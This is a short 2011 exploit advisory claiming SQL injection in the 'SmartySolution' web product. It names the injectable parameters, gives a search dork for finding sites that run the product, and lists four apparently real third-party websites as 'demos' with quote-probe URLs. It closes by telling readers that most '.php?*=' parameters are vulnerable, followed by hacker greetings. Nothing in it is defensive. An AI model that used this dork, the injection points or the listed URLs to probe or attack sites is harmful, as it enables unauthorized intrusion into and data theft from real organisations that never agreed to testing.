SmartySolution Sql injection

[+] Exploit Title : SmartySolution Sql injection
[+] Date : 06 June 2011
[+] Author : Anas
[+] Category : WebApps
[+] d0rk : "by www.SmartySolution.com.au"
[+] Facebook : http://www.facebook.com/profile.php?id=100000442288288
[+] Tested on : Windows Xp SP3

#########################################################

http://localhost/container.php?content=smnuContent&os_id= Sql here

http://localhost/container.php?pid= sql here

#########################################################

Demos :

http://www.uniglazewindows.com/container.php?pid=4'

http://www.goldcoastkids.com.au/container.php?content=smnuContent&os_id=13'

http://www.brisbanekids.com.au/container.php?content=generalContent&pid=5'

http://www.ringworldwide.com.au/container.php?area=common&action=payment_refund'

Check all .php?*= , mostly all vul.. to sqli.!

# (^_^) ! Good Luck ALL ...

Greetz To : Tn-V!rus - s-man - ahmdosa - kodak - Ali - all my friends and Tunisian Hackers !

Proud to be TUNISIAN